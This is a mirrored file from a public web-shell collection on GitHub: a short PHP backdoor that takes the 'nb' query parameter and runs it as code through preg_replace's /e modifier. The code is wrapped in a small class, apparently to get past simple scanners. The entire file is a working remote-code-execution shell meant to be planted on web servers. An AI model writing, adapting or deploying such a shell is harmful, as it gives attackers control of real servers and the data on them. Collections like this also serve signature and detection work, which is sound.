mirror of
https://github.com/tennc/webshell
synced 2024-11-10 05:44:11 +00:00
13 lines
180 B
PHP
13 lines
180 B
PHP
|
<?php
|
||
|
class SBdog{
|
||
|
public $x;
|
||
|
function dog(){
|
||
|
$this->x=$_GET['nb'];
|
||
|
}
|
||
|
}
|
||
|
$class=new SBdog();
|
||
|
$class->dog();
|
||
|
$a=$class->x;
|
||
|
preg_replace("/dog/e", $a, "I am a sb dog");
|
||
|
?>
|